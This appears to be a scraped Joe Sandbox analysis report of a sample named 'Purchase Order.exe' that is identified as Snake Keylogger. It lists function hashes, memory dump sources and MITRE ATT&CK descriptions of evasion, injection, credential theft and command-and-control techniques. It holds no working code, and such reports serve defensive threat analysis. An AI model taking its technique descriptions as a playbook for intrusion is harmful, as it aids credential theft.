Opcode ID: 3a252e94566ffb9bc4758d35dcd2b6f788757b38b31e070f7fdaa57dda3b555b
Instruction ID: f285762b3bbc06c6c061dd58bb912640b6c564e7e7d55195a71f54a5f723d79e
Opcode Fuzzy Hash: 3a252e94566ffb9bc4758d35dcd2b6f788757b38b31e070f7fdaa57dda3b555b
Instruction Fuzzy Hash: A0C19F74E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC6778 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3abcfb28f77c3252d957bf59f6392791018e8a93976eb42cf4299153fe74ca4
Instruction ID: 0014357500590549132533ad72cd53ec235b5f6e41d35b69b14674378f4da0fc
Opcode Fuzzy Hash: c3abcfb28f77c3252d957bf59f6392791018e8a93976eb42cf4299153fe74ca4
Instruction Fuzzy Hash: DDC1A174E01219CFDB54DFA5C994B9DBBB2BF89300F2081AAD809AB364DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC6320 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ee8346dbe58fbff484bcfa969e76f67397df32a098d975892eda93480953f3
Instruction ID: 84418ccc9c4c2bf7777c5c7f7685bd38a6890cc99d08aca1012da61cb5bf9a65
Opcode Fuzzy Hash: a1ee8346dbe58fbff484bcfa969e76f67397df32a098d975892eda93480953f3
Instruction Fuzzy Hash: EDC1A274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB354DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC08F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1411a133c77606c83137c0754ef3a324a2efeb2dc932509aa03c8a77b5b864
Instruction ID: 37ac23c950915e6588cac92426eb72a8d98815d32bc487d63b84ed6a0990a867
Opcode Fuzzy Hash: 9b1411a133c77606c83137c0754ef3a324a2efeb2dc932509aa03c8a77b5b864
Instruction Fuzzy Hash: FAC1AE74E01219CFDB54DFA5C994B9DBBB2BF89300F2080AAD809AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847f3f8b067239ee71721721dc4f85c83c2b41021bf3a3b2e435584031200223
Instruction ID: 7f57a4952a2b9c335ead1cff8eaf051112e54207de44473dafceadc12e3c4ae2
Opcode Fuzzy Hash: 847f3f8b067239ee71721721dc4f85c83c2b41021bf3a3b2e435584031200223
Instruction Fuzzy Hash: C0C1AF74E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC74A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c01b8c5120857a1d8eb89d5067012ef9dcc60f6b7efb28714ba66812e02b654
Instruction ID: 7e8b470b75abd81ac0fe1c240d15e4c4a83d52422a43864a3753be2a19dac091
Opcode Fuzzy Hash: 3c01b8c5120857a1d8eb89d5067012ef9dcc60f6b7efb28714ba66812e02b654
Instruction Fuzzy Hash: F4C19074E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfed4a72bfca2d68e7a399e3e49939e9e94d91af33adf13459595db387a1a1b
Instruction ID: ac8f167c1bdf19df376bad7e0bea11776ae7052125eaaa8af68c84d0cb069d9f
Opcode Fuzzy Hash: dbfed4a72bfca2d68e7a399e3e49939e9e94d91af33adf13459595db387a1a1b
Instruction Fuzzy Hash: E6C1B174E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC5198 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b492dec051af7f58cddfcab3c32200b95cc840ea3000d3a4bda495161d9cc45
Instruction ID: c500c56b8923b640734dc1108e75e1ed8cc50b4258e109bbfa3b358334c03912
Opcode Fuzzy Hash: 1b492dec051af7f58cddfcab3c32200b95cc840ea3000d3a4bda495161d9cc45
Instruction Fuzzy Hash: 10C1A274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB364DB356A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC81B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9453b4586b527b53f850b116d3feb0d9dedff72a6b4261fb0d7a67623b1b55e
Instruction ID: 97dc56912f5bd89add16473b6424d90ec914c32e007d34da5df572a65174da5b
Opcode Fuzzy Hash: b9453b4586b527b53f850b116d3feb0d9dedff72a6b4261fb0d7a67623b1b55e
Instruction Fuzzy Hash: 02C19174E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52ff22f9b71e89bf790eb3303efa82bd0ea9fdee7f2fc10406d4750757d1997
Instruction ID: cda4f0f1ace382a7c629ba77e8a0f8d767be7ba5a0a8729b75ff02706acaef8e
Opcode Fuzzy Hash: f52ff22f9b71e89bf790eb3303efa82bd0ea9fdee7f2fc10406d4750757d1997
Instruction Fuzzy Hash: C5C1B274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC7D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a828b0935625dec66497f98269e43bdf96e9baa22a28fc4119eb356af953495
Instruction ID: 56fd7d5a6bd98a4b5e105e768cff652ab878a0f545e05434ef624d09aa6d4be2
Opcode Fuzzy Hash: 6a828b0935625dec66497f98269e43bdf96e9baa22a28fc4119eb356af953495
Instruction Fuzzy Hash: DEC19074E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB354DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CC7900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dee6e6aa4dec62989212b09fe3ca3837161594c3d861a6cf910d3b7f34a4e96d
Instruction ID: 25732a52f7ab91d100ebd6a304ec5b40f9ac5d74328716fc5f062f6846d56422
Opcode Fuzzy Hash: dee6e6aa4dec62989212b09fe3ca3837161594c3d861a6cf910d3b7f34a4e96d
Instruction Fuzzy Hash: 74C1A174E01219CFDB54DFA5C994B9DBBB2FF89300F2080AAD809AB354DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 015260E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 01526126
\;]q, xrefs: 015260FE
\;]q, xrefs: 015260F4
\;]q, xrefs: 0152611A

Memory Dump Source

Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 8c4bfc1cc4ee6a90690f9ec865f715b34e9bab0c5378f05d6cbbe34217a27732
Instruction ID: 86ff467bbca6f144ad1247cbf9cd3961c74904ca198ac30708a638bf4675081f
Opcode Fuzzy Hash: 8c4bfc1cc4ee6a90690f9ec865f715b34e9bab0c5378f05d6cbbe34217a27732
Instruction Fuzzy Hash: A501A7727100258FDB689E2DC48092977E7BF8A760B354569ED06CF3F2DA31EC418790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
Purchase Order.exe

Function 00C2D6D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 06D64285 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 06D64290 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00C2B038 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Function 00C2590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 00C244B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 06D64000 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 06D64008 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 06D640F1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 06D63E6A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 06D63E70 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre